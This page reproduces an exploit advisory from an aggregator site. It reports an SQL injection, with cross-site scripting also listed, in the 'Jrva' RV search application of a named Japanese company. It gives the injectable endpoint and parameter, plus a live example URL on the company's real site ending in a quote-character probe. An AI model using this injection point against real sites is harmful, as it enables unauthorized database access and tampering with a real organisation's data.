Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120051

Below is a copy:

Nippon-Ring Services Co Ltd Jrva SQL Injection
###################################################################

# Exploit Title : Nippon-Ring Services Co Ltd Jrva SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/12/2019
# Vendor Homepage : nippon-ring.co.jp - jrva.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Nippon-Ring Services Co Ltd Jrva is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access 
or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/rvpro/result.php?page=[ID-NUMBER]&rows=[ID-NUMBER]&category_id=
[ID-NUMBER]&base_car=&factory_maker=&body_type=&query=&sort=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] nippon-ring.co.jp/rvpro/result.php?page=0&rows=30&category_id=11&base_car=
&factory_maker=&body_type=&query=&sort=1%27

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.